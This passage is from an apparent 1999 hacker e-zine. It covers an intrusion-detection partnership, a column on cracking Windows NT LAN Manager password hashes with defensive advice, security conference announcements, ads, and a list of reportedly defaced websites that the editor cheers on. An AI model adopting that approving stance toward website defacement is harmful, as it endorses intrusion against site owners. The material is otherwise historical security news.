Kim could become a "national treasure" in the information society of the future. He added that he will guide Kim along the legal path of computer work. (Park Joon-hyun, jhpark@chosun.com) @HWA 09.0 The l0pht and NFR team up to produce top flight IDS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.nfr.net/news/press/19990301-l0pht-filters.html NFR and L0pht to Deliver Best-of-Breed Intrusion Detection L0pht to use extensive knowledge of attack signatures to expand filter set for NFR software 01 March 1999 Washington, DC and Boston, MA Network Flight Recorder� (Bloomberg Ticker: 9022Z EQUITY) and L0pht Heavy Industries, Inc. today announced a strategic relationship that redefines the boundaries for cooperation in intrusion detection. In a partnership that combines the respected "white-hat" knowledge of attack signatures with the industry leading intrusion detection engine, L0pht will create a large set of backends for the NFR software. The backends, or filters, will provide users with real-time alerts for various types of intrusions and unwanted activity on their networks, including information gathering, denial of service, and network attacks. As soon as the NFR system is attached to the network, the new backends will begin watching for common and obscure attacks. New backends, which will be provided to users on a monthly basis, will watch for the latest attacks. Administrators can automatically push the new backends to remote NFR systems, without having to upgrade or modify any software. Because the backends will be written in N-Code, NFR's flexible open-standard traffic analysis specification language, users can examine and verify the underlying code, or modify them to match their internal security policies. Commenting on the partnership, Marcus J. Ranum, President and CEO of Network Flight Recorder, noted, "L0pht has an amazing depth of information about system vulnerabilities, and are the ideal source for cutting edge intrusion detection signatures. By adding their 'white-hat' knowledge to our existing capabilities, we have an unbeatable combination. Today, NFR is the most popular intrusion detection and monitoring system for many of our users based on its powerful customizable capabilities – with the formation of this partnership we further cement our lead in the industry." In a recent user poll, NFR soundly outperformed intrusion detection products from Axent (NASDAQ: AXNT), ISS (NASDAQ: ISSX), and Cisco (NASDAQ: CSCO). "When real network managers and users rate your product as best, that’s satisfying," continues Ranum. "Our product shines where it matters the most: solving real problems and securing real networks for real network managers." "Having the ability to handle strange network traffic in a flexible manner and the ability to tweak even the lowest level components of the intrusion detection engine offers a functionality scope and comfort level that other products simply cannot attain," said Dr. Mudge of L0pht Heavy Industries, Inc. "In this field the consumer is really purchasing an elevation in ‘peace-of-mind’ about the way their network works. This cannot be done on blind faith alone. NFR was the only commercial package capable of being used for intrusion detection that released full source code to the academic community. Combine this with the network and computer security expertise that is found at L0pht and the history that L0pht has for being a ‘consumer watchgroup’ – the two companies working together on projects was a logical next step." Availability The L0pht intrusion detection backends will be included in the next commercial release of the NFR software, scheduled for availability in early second quarter 1999. NFR software can be purchased from certified NFR resellers worldwide. About Network Flight Recorder (NFR) Network Flight Recorder, with offices around the United States and resellers worldwide, is a leading developer of intrusion detection, network traffic, and network analysis tools. The flexibility of the NFR software provides effective local and distributed misuse detection solutions for small, medium, and large environments. NFR’s highly customizable technology is deployed at more than 1,000 sites worldwide, including financial institutions, government, military and intelligence agencies, and Fortune 500 firms. NFR news and company information can be found on The Bloomberg under the ticker symbol: 9022Z EQUITY and on the World Wide Web at http://www.nfr.net. About L0pht Heavy Industries, Inc. L0pht [L0PHT] Heavy Industries, Inc., has been recognized as a collection of some of the top hackers in the US. Since the early 90s, L0pht has acted as a consumer watchgroup and underground engineering team whose goal has been improving computer and network security while educating users, programmers, and corporations. In 1997, L0pht released their Windows NT password-auditing tool, L0phtCrack, which quickly became the defacto standard auditing tool for both government and the commercial sector. On May 18, 1998, they presented expert testimony to the United States Senate on government systems security. The L0pht has appeared in Wired Magazine, Byte Magazine, various academic journals, BBC, The Washington Post, and numerous other publications. http://www.L0pht.com. Contact Network Flight Recorder Barnaby Page 202.662.1400 barnaby_page@nfr.net L0pht Heavy Industries http://www.l0pht.com [L0PHT] press@l0pht.com -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 10.0 A good example of how "Secure" NT really is ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Network Computing via Techweb http://www.techweb.com/se/directlink.cgi?NWC19990308S0022 March 08, 1999, Issue: 1005 Section: Columnists With Friends Like These... Art Wittmann A couple of freelance writers are working on a story for us about security auditing and protection. As part of their "research," they decided to see if they could hack into one of our lab networks. It took them only a few hours to successfully break into our Windows NT boxes. And from there, they learned the configuration of our lab networks, the server names and functions, the operating systems we run and most of the passwords on the key accounts on our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a good many of our routers and switches. Our lab is not run as a mission-critical production network-it isn't meant to be particularly secure. But we do stay up to date on most service packs and patches for the major operating systems. So, unless you've taken a very active stance on security for your network, you should be worried. Reusing Passwords? The hacking expertise of these guys is by no means unique. Plenty of people out there can do what they did, and some can do it better. While NT has its fair share of vulnerabilities out of the box, there is a LAN Manager issue that blows the doors wide open. In summary: NT stores password hashes in a format that is hard to crack by brute-force methods, and that's a good thing. However, Microsoft has chosen to maintain compatibility with LAN Manager's password store, and therefore keeps a second hash of passwords. This table isn't so secure. In fact, brute-force methods usually can come up with a few passwords in short order. Within two hours, our hackers had obtained 5,000 of our 5,045 passwords by brute-forcing them. A few days and millions of keystrokes later, using those same passwords, they owned the entire network. So, do you use the same passwords across all platforms? The problem is exacerbated for smaller shops where a single crew administers NT, NetWare, Unix and other systems because they tend to use the same administrator password for all systems under the group's management. For very obvious reasons, that's a bad idea. Our lab was no exception, and our hackers quickly infiltrated our NetWare and Unix servers, as well as our Cisco routers. Instructions for cleaning up this hole in NT are provided in the Microsoft Knowledge Base article Q147706. However, doing so may break applications that still use the LAN Manager hash table. In particular, if you're still using DOS or Windows 3.1, problems are likely. And if you're running OS/2 LAN Manager, implementing Microsoft's fix will break compatibility. From what I've read about this security hole in the writings from the hacker community, Service Pack 3 contains a number of security fixes that make it harder to crack passwords. These should be implemented, but regardless, LANMan compatibility needs to be disabled if you want your NT server to be secure. Expect Little Help From Microsoft Of course, Microsoft doesn't promote the fact that a security hole exists or that it can be patched. If you're clever enough to know about it and to ask the right questions, the company will provide a fix. In my opinion, that's something akin to Ford putting a sticky note on the bulletin board outside the CEO's office about a little Pinto gas-tank problem and then claiming that the hazard was adequately publicized. Finally, you'd think that Windows 2000 would be the perfect place for Microsoft to rid itself of this problem, wouldn't you? Well, just like me, you'd be wrong. It turns out that Microsoft is committed to maintaining LANMan compatibility in Windows 2000 out of the box. The moral of the story is clear: The onus is on you to protect the integrity of your systems; Microsoft is not going to go out of its way to help you. You must dedicate staff to following the security advisories about all your operating systems-simply looking at the vendor's home pages is not enough. A good many of the hackers out there publicize the security holes they know about. It's my advice that you heed them well. Send your comments on this column to Art Wittmann at awittmann@nwc.com. Copyright � 1999 CMP Media Inc. @HWA 11.0 The Black Hat Briefings Security Conference ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From the [ISN] list) Forwarded From: Jeff Moss <jm@defcon.org> The Black Hat Briefings '99 http://www.blackhat.com/ July 7 - 8th, Las Vegas, Nevada Computer Security Conference Announcement Computer Security Conference Description and Overview It's late. You're in the office alone, catching up on some system administration tasks. Behind you, your network servers hum along quietly, reliably. Life is good. No one can get to your data or disrupt your WAN. The network is secure. Or is it? While we could create more fear, uncertainty, and doubt (FUD), we would rather announce The Black Hat Briefings '99 conference! The Black Hat Briefings conference series was created to provide in-depth information about current and potential threats against computer systems by the people who discover the threats. To do this, we assemble a group of vendor neutral security professionals and let them talk candidly about the security problems businesses face and the solutions they see to those problems. No gimmicks, just straight talk by people who make it their business to explore the ever-changing security space. While many conferences focus on information and network security, only The Black Hat Briefings will put your managers, engineers, and software programmers face-to-face with today's cutting edge computer security experts and "underground" security specialists. New for 1999, there will be three tracks of speaking. The "White Hat" track will inform your CEO or CIO with no-nonsense information about what issues to be aware of, and what they can ignore. The two "Black Hat" tracks will provide your technical staff with nitty-gritty technical information about current and potential threats to your computer systems. Only the Black Hat Briefings conference will provide your staff with the pragmatic tools and knowledge they need to help thwart those lurking in the shadows of your fire wall or the depths of your company's WAN. The reality is they are out there [back to the FUD]. The choice is yours--you can live in fear of them, or you can learn from people like them. Conference Overview Spanning two days with three separate tracks, The Black Hat Briefings will focus on the vital security issues facing organizations with large Enterprise networks and mixed network operating systems. Topics will Include Intrusion Detection Systems (IDS), Computer Forensics (CF)systems, Incident Response, Hostile Mobile Code, vulnerability analysis, secure programming techniques, tool selection for creating and effectively monitoring your networks, and management issues related to computer security. You will be put face-to-face with the people developing the tools used by and against hackers. This year the Black Hat Briefings has grown to include a separate track specifically designed for the CEO and CIO. This third track, nick named the "White Hat" track, was developed by the National Computer Security Center (NCSC) of the National Security Agency. While the other tracks have a technology focus, this track is for people who have to manage an organization's security posture. What should you look for when hiring an outside security consultant? Should you even look outside your organization? What are the potential security threats? What should you do to reduce the risk of losses due to computer security incidents? The "White Hat" track will help you answer these questions. The Black Hat Briefings has developed a reputation for lively and in-depth presentations and discussions between "underground" security celebrities, vendors, and attendees. This year you can expect more visual demonstrations, more speakers who are authoritative in their fields, and, as always, an excellent time. As an added bonus, people who attend The Black Hat Briefings get free admission to DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las Vegas. For more information see the DEFCON web site at http://www.defcon.org/. Speakers Current Speakers include the following. - Bruce Schneier, author of Blowfish, TwoFish and Applied Cryptography. - Marcus Ranum, CEO of Network Flight Recorder and designer of the first commercial fire wall. - Dominique Brezinski, Network Security Consultant. - Greg Hogland, Author of the Asmodeous NT scanner and the Web Trends security scanner. - Peter Stephenson, Principle consultant of the Intrusion Management and Forensics Group. - The Simple Nomad, of the Nomad Mobile Research Centre More speakers will be listed as the call for papers ends on March 15th. Location The Venetian Resort and Casino Las Vegas, NV (http://www.venetian.com/) Registration Costs Registration costs are $995 US before June 14th 1998. Late registration fees are $1,195 after June 14th. You may cancel your registration before July 1st for a full refund. This fee includes two days of speaking, materials, a reception, and meals. To register, please visit http://www.blackhat.com/ Sponsors Secure Computing Corporation (http://www.securecomputing.com/) The National Computer Security Center (NCSC) Network Flight Recorder (http://www.nfr.com/) Counterpane Systems (http://www.counterpane.com/) Aventail (http://www.aventail.com/) More Information email: blackhat@defcon.org with email questions or visit http://www.blackhat.com/ for the latest speakers and events listings. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 12.0 CQRE (Secure) Congress and Exhibition ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Detlef [iso-8859-1] H�hnlein" <huehnlein@secunet.de> *************************************************************** Call for Papers CQRE [Secure] Congress & Exhibition Duesseldorf, Germany, Nov. 30 - Dec. 2 1999 --------------------------------------------------------------- provides a new international forum covering most aspects of information security with a special focus to the role of information security in the context of rapidly evolving economic processes. --------------------------------------------------------------- Deadline for submission of extended abstracts: May 14, 1999 website: http://www.secunet.de/forum/cqre.html mailing-list: send mailto:cqre@secunet.de (where the subject is "subscribe" without paranthesis) *************************************************************** The "CQRE - secure networking" provides a new international forum giving a close-up view on information security in the context of rapidly evolving economic processes. The unprecedented reliance on computer technology transformed the previous technical side- issue "information security'' to a management problem requiring decisions of strategic importance. Hence, the targeted audience represents decision makers from government, industry, commercial, and academic communities. If you are developing solutions to problems relating to the protection of your country�s information infrastructure or a commercial enterprise, consider submitting a paper to the "CQRE - secure networking" conference. We are looking for papers and panel discussions covering: .. electronic commerce - new business processes - secure business transactions - online merchandising - electronic payment / banking - innovative applications .. network security - virtual private networks - security aspects in internet utilization - security aspects in multimedia- applications - intrusion detection systems .. legal aspects - digital signatures acts - privacy and anonymity - crypto regulation - liability .. corporate security - access control - secure teleworking - enterprise key management - IT-audit - risk / disaster management - security awareness and training - implementation, accreditation, and operation of secure systems in a government, business, or industry environment .. security technology - cryptography - public key infrastructures - chip card technology - biometrics .. trust management - evaluation of products and systems - international harmonization of security evaluation criterias .. standardization .. future perspectives Any other contribution addressing the involvement of IT security in economic processes will be welcome. Authors are invited to submit an extended abstract of their contribution to the program chair. The submissions should be original research results, survey articles or ``high quality'' case studies and position papers. Product advertisements are welcome for presentation, but will not be considered for the proceedings. Manuscripts must be in English, and not more than 2.000 words. The extended abstracts should be in a form suitable for anonymous review, with no author names, affiliations, acknowledgements or obvious references. Contributions must not be submitted in parallel to any conference or workshop that has proceedings. Separately, an abstract of the paper with no more than 200 words and with title, name and addresses (incl. an E-mail address) of the authors shall be submitted. In the case of multiple authors the contacting author must be clearly identified. We strongly encourage electronic submission in Postscript format. The submissions must be in 11pt format, use standard fonts or include the necessary fonts. Proposals for panel discussions should also be sent to the program chair. Panels of interest include those that present alternative/controversial viewpoints or those that encourage lively discussions of relevant issues. Panels that are collections of unrefereed papers will not be considered. Panel proposals should be a minimum of one page describing the subject matter, the appropriateness of the panel for this conference and should identify participants and their respective viewpoints. mailing list/ web-site: ----------------------- If you want to receive emails with subsequent Call for Papers and registration information, please send a brief mail to cqre@secunet.de. You will find this call for papers and further information at http://www.secunet.de/forum/cqre.html . important dates: ---------------- deadline for submission of extended abstracts May 14, 1999 deadline for submission of panel proposals June 1, 1999 notification of acceptance June 25, 1999 deadline for submission of complete papers July 30, 1999 program chair: -------------- secunet - Security Networks GmbH c/o Rainer Baumgart Weidenauer Str. 223 - 225 57076 Siegen Germany Tel.: +49-271-48950-15 Fax: +49-271-48950-50 R.Baumgart@secunet.de program committee: ------------------ Johannes Buchmann (TU Darmstadt) Dirk Fox (Secorvo) Walter Fumy (Siemens) R�diger Grimm (GMD) Helena Handschuh (ENST/Gemplus) Thomas Hoeren (Uni Muenster) Pil Joong Lee (POSTECH) Alfred Menezes (U.o.Waterloo/Certicom) David Naccache (Gemplus) Clifford Neumann (USC) Mike Reiter (Bell Labs) Matt Robshaw (RSA) Richard Schlechter (EU-comm.) Bruce Schneier (Counterpane) Tsuyoshi Takagi (NTT) Yiannis Tsiounis (GTE Labs) Michael Waidner (IBM) Moti Yung (CERTCO) Robert Zuccherato (Entrust) -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] 13.0 Canc0n99 the grassroots con for North America ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This promises to be quite the event, even although nothing is carved in stone yet since it is early days the tentative dates are Aug 19th-22nd "somewhere in Niagara Falls" region right near the tourist trap. Several venues are under consideration and the dates are flexible and may change to suit speaker availablity. We're still looking for people that are willing to speak or people that want to submit papers to have introduced at the c0n, send in your proposals now to be sure that you have a space on the schedule with papers and talks aside there will be sightseeing and the opportunity to party and generally socialize with the younger set it should prove quite interesting all around from professors to "punk ass hax0rs" ;-) some of the people may surprise you and that will be the key to success for this con.fun.it will be a fun event with tshirts and other giveaways to show you were there...don't miss out, register in advance and this will probably be the most fun you can have for a measly $15 Cdn ($10 US) cd burning parties, for linux / bsd cd's etc (byocds) visit http://come.to/canc0n99 for up to date news as it becomes available. For those interested there are pre-con T-Shirts available for $20 Cdn with the hwa logo (pictures to come on the site) send in your order requests to the main email and you will be notified when they are ready to ship, all proceeds go towards making the con a better event and dj equipment etc....this is a NON PROFIT event!!!! we're hoping to break even at best so get as many of your friends together as you can and order a cool T-shirt or preregister for the con and help us make it a huge success. Vendors welcome see site for details. SPEAKERS wanted! interested? email us your idea/proposal... @HWA 14.0 Countering Cyberterrorism ~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov> Courtesy of Cryptography List. Originally From: Clifford Neuman <bcn@ISI.EDU> Countering Cyber-Terrorism June 22-23 Marina del Rey, California A workshop sponsored by the Information Sciences Institute of the University of Southern California Call for Participation Recent studies warn of Cyber-Terrorism and the vulnerability of our computer systems and infrastructure to attack. These reports identify damage that determined, knowledgeable, and well-financed adversaries could inflict on commercial, government, and military systems. Such attacks would have severe consequences for the public, and in particular the economy, which has become dependant on computers and communications infrastructure. The objective of this workshop is to identify things that should be done to improve our ability to detect, protect against, contain, neutralize, mitigate the effects of, and recover from cyber-terrorist attacks. Participants are sought from the computer security, electronic commerce and banking, network infrastructure, military, and counter-terrorism communities, as well as those with experience of cyber-terrorist attacks. Recommendations may suggest research and development or operational measures that can be taken. The workshop is NOT a forum for presentation of the latest security systems, protocols or algorithms. The workshop will address the strategies, framework, and infrastructure required to combine and incrementally deploy such technologies to counter the cyber-terrorist threat. Attendance will be limited to approximately 25 participants. Participants will be selected on the basis of submitted position papers that raise issues for the workshop to discuss, identify threats or countermeasures, or propose strategies or infrastructure to counter the threat of cyber-terrorism. Position papers should be four pages or less in length. Submissions should be sent in e-mail in Word or PDF format, or as ASCII text to cyber-terrorism-ws@isi.edu. Please check the web page http://www.isi.edu/cctws for more information, including a position paper from the organizers which will be available two weeks prior to the submission deadline. Important Dates: Organizer's Paper Available April 5, 1999 Position Papers Due April 19, 1999 Notification of Acceptance May 1, 1999 Revised Position Papers Due May 28, 1999 Position Papers Available on Web June 9 Workshop Dates June 22-23 Organizing Committee: Bob Balzer, Information Sciences Institute, Balzer@isi.edu Thomas Longstaff, CERT Coordination Center, tal@cert.org Don Faatz, the MITRE Corporation, dfaatz@mitre.org Clifford Neuman, Information Sciences Institute, bcn@isi.edu -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA -=- :. .: -=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA H.W Hacked websites Feb 28th-March 7th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) In the last release we mentioned that www.hackernews.com's server was showing only the directory structure and no site was available also that the www.l0pht.com server was not accepting http requests, neither site was indeed hacked they were both merely down for maintenance, but it was 'reported' here as a possible hack since I didn't have time to confirm or deny the report by contacting the admins before the issue went out, hope it didn't cause too much of an annoyance to anyone and my apologies to both hackernews and the l0pht for any alarmism perceived or imagined by the report 8-o - Ed March 11th Raza-Mexicana's crack National Commission of Human Rights web page and replaced it with a political message. archived by HNN at http://www.hackernews.com/archive/crackarch.html http://www.cndh.org.mx March 10th contributed by Anonymous Cracked We have reports that the following sites have been compromnised, some of them by the RAzaMExicana Hackers TEam. http://www.unca.edu.ar http://biblioweb.dgsca.unam.mx/revistas http://biblioweb.dgsca.unam.mx/AGN http://www.digital-holding.no http://www.efo.no http://www.prestkvern.no http://www.usoft.no http://www.waaler.no http://www.input.nohttp://www.input.no News of these sites was contributed to Help Net Security by Deepcase and HNN by anonymous Cracked March 6th/7th http://www.tcedge.com http://www.home-listings.com http://www.eecsys.com http://www.globestf.com http://www.rossi-consulting.com http://www.ircn.com http://www.neslabinc.com http://www.des-con-systems.com http://resource-central.com/ http://totalarmstrength.com/ http://www.landbridge.gov.cn/ http://www.softwaresuccess.com/ http://www.pwr1.com http://www.montgomeryhospice.com/ http://wrair-www.army.mil/ http://ohrm.niddk.nih.gov/ http://www.gunmetalblue.com http://www.all-the-marbles.com http://www.neslabinc.com http://www.rossi-consulting.com http://www.cleanstart.com http://www.netzero.net http://www.netsnitch.com http://www.eranorton.com http://www.ritop.com http://www.tcedge.com http://www.home-listings.com http://www.eecsys.com http://www.globestf.com http://www.eyecare-experts.com http://www.hitecdentist.com @HWA _________________________________________________________________________ A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- � 1998, 1999 (c) Cruciphux/HWA.hax0r.news (r) Cruciphux is a trade mark of Hunted & Wounded Associates -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]